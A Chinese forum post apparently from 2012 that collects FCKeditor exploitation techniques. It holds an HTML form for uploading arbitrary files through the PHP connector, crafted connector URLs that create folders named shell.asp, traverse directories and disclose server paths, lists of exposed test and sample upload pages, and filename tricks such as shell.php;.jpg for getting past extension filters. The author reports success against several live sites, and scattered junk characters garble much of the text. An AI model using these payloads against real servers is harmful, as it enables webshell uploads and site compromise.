Fckeditor漏洞利用总结
0 O% G, g" X- O) L! u2 R* x/ A; s查看编辑器版本
% b+ L n- t. ^2 y3 S; i+ q0 H! e3 mFCKeditor/_whatsnew.html3 Q3 L! U4 ~2 @5 K* ~1 \
—————————————————————————————————————————————————————————————9 j# [- |$ \& i9 p: c
/ a* M: Q; n1 W9 O" B7 V; W
2. Version 2.2 版本' E" a& A9 w' w) v }
Apache+linux 环境下在上传文件后面加个.突破!测试通过。7 Y0 X: p" v+ O0 o: X
—————————————————————————————————————————————————————————————
. k3 Y6 g7 `9 {7 W3 Z: a3 K8 f+ @+ z* @# u% O' h) d
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。" M! {% Z5 \! E7 r$ u, Y
<form id="frmUpload" enctype="multipart/form-data"6 V; H( A0 v f7 C- `
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
. L8 o, D# G4 K+ m<input type="file" name="NewFile" size="50"><br>
( ]5 R2 d$ X3 _( H# `: ]<input id="btnUpload" type="submit" value="Upload">. V3 t' i- o6 O4 b$ W) s
</form>
; [5 T; k) ]& x* d2 E—————————————————————————————————————————————————————————————
* C) H! K& R2 Z3 Q. F' @' P; ]' F5 s# k
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
2 Y$ c D# z# t% M: ~ 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
: H) p* j; |9 R1 K s 4.1:提交shell.php+空格绕过( R2 `; l1 N+ m$ C/ l& B! `
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
v& E+ n; D& p! m1 z 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。) \/ o# q3 j+ k' Y+ z
—————————————————————————————————————————————————————————————4 r2 E" P! ?2 n' J/ B
, G; v" w; ]( L2 m5 F
5. 突破建立文件夹' a0 R* y0 M& F; [3 N( d
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684) c1 C& q; _/ L9 T2 [
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3 R Z1 `' {1 e, [—————————————————————————————————————————————————————————————
' R& K- B" G) Y7 e, Q8 j& v0 J( p4 X/ V8 L
6. FCKeditor 中test 文件的上传地址
1 Q/ f- {6 l- V/ jFCKeditor/editor/filemanager/browser/default/connectors/test.html
- T6 E# A( S; x8 K' V3 dFCKeditor/editor/filemanager/upload/test.html
, K \$ G$ k4 L, }FCKeditor/editor/filemanager/connectors/test.html
8 d5 |* S k3 b9 K# G! ]! |: a% \FCKeditor/editor/filemanager/connectors/uploadtest.html( Y( z8 k7 Y( C9 S
—————————————————————————————————————————————————————————————
' H- s( F1 y& m+ y
& m$ I& _& M: U; e( q n' X7.常用上传地址
% s2 V" L3 ~7 f3 @FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
! m' V+ g6 a3 ]2 ]! r, p+ WFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
, S/ G! ^8 f' `7 IFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)( [# x4 u% v% T; J
JSP 版:
8 c( N4 z( D. P" KFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
0 o. Y# k, b! W2 y% g# k注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
, g7 D" i$ I5 E3 L8 e% W5 g件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。6 ?) g7 [( O# k4 o/ l
—————————————————————————————————————————————————————————————5 W! t$ ]$ @4 y! R8 X$ |2 R
9 X c/ R. V3 M( y% ^
8.其他上传地址
9 N1 n% |3 t# t9 H' R! bFCKeditor/_samples/default.html0 F1 Q/ a2 |1 |! r7 m
FCKeditor/_samples/asp/sample01.asp. p5 J* o% K; I& u
FCKeditor/_samples/asp/sample02.asp- f. p: W0 L; ^$ Y$ K; {5 M
FCKeditor/_samples/asp/sample03.asp
& K @! u9 i% ?FCKeditor/_samples/asp/sample04.asp: ~8 [: M* g. l# {% ?2 V5 n# P, R! }
一般很多站点都已删除_samples 目录,可以试试。
5 y \& X) p3 {& Z, S' q% YFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。) |. ~6 J9 Z% T) o" @" E
—————————————————————————————————————————————————————————————
7 J% p4 Z7 r' W2 @8 ?
& V3 {6 J9 m8 T. t7 m9.列目录漏洞也可助找上传地址- I/ A: j2 @0 F) _' ^( F0 T
Version 2.4.1 测试通过" r" H( Y/ J* s$ a: O8 Z
修改CurrentFolder 参数使用 ../../来进入不同的目录
) T+ E9 D7 }) t% X) P/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
! V5 I/ _- |, I6 v) @9 P6 m根据返回的XML 信息可以查看网站所有的目录。
2 ?8 F5 `3 A; j4 N3 M0 DFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F7 W/ O; f; K/ U) l% J5 f
也可以直接浏览盘符:0 D/ h: S, H7 s! v9 I, O& v0 X
JSP 版本:
0 t9 C$ ]1 B) G; A) A5 WFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
& ]) ]& Q _( G( } q—————————————————————————————————————————————————————————————
9 Z t& S5 c! O* t9 \+ B8 W4 }4 A& g- ?! \
10.爆路径漏洞% g3 a) k! `- e8 l
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp8 r* ]" L1 B6 `5 o
—————————————————————————————————————————————————————————————
( w- s6 T' o! c0 ]9 Y+ N5 A, L1 c4 g
11. FCKeditor 被动限制策略所导致的过滤不严问题. ^: M: I9 w( d
影响版本: FCKeditor x.x <= FCKeditor v2.4.35 ?3 n( ?; [: N- T
脆弱描述:
" T' K! I: p4 |" K& w8 z `FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
9 R2 t% ^! r3 y1 hhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
0 s/ X( Z# V1 Q: X1 N1 Q& yFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!8 F- N; i/ G+ v, k
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
: c7 t" w$ A, i2 _' q$ L 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
0 ~" p! a% N! ?+ w—————————————————————————————————————————————————————————————
! @7 H+ ~% X) q, B& T8 l
0 I# Z7 V2 X! e" J6 r8 S12.最古老的漏洞,Type文件没有限制!
! p/ l1 e9 d3 y 我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
: Y% x5 o; r x+ L" p—————————————————————————————————————————————————————————————
. k* D3 ?) O+ T0 }. H0 c
; J; [* U) }% S) c" T8 u6 ~===============================================================================================================================================5 P9 Q9 g7 r6 Z8 U& X
! f1 H. @4 Z c+ GFCK编辑器jsp版本漏洞:
, H9 v4 K% f+ F
& l o- r4 a7 U" G3 @1 M D" @/ g# N. u& R+ j$ {! }5 e
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
7 x4 O6 E1 d5 E. l O* N0 }+ U. Y& J3 ~
上传马所在目录) [, \: H- R' N# T7 }0 R" @
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/9 G; \) K7 A# K0 Y5 d9 g* n
上传shell的地址:- ~8 r9 }- _+ L: z/ M
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector" r' i% ~ M4 k& D+ V
跟版本有关系.并不是百分百成功. 测试成功几个站.7 a( l# t) i' o$ N
不能通杀.很遗憾.
1 I( u( |, y% D% w( W( Zhttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector Y9 K- v$ F+ m. U1 g
如果以上地址不行可以试试
" r n4 D' E: T# N) ^3 B# x; sFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
$ f* z% O6 s7 N, b1 P- O. C7 ZFCKeditor/_samples/
0 w6 @8 G. u+ ]9 K/ ]1 `FCKeditor/_samples/default.html
0 u5 R1 x5 x2 D4 p) GFCKeditor/editor/fckeditor.htm
$ P& @. H0 x8 z0 w" V1 e9 ^, oFCKeditor/editor/fckdialog.html
; C7 w4 U7 w6 ]* W" [+ P
. L8 r2 J" E; S
( f3 Y% j S1 }+ C+ E, y, @( g1 u; p& O6 S
解析漏洞+未重命名文件时上传漏洞 1.asp;jpg! u! X! o5 \7 I* o; ?# e2 b
|
发表于 2012-9-13 17:01:39
收藏
支持
反对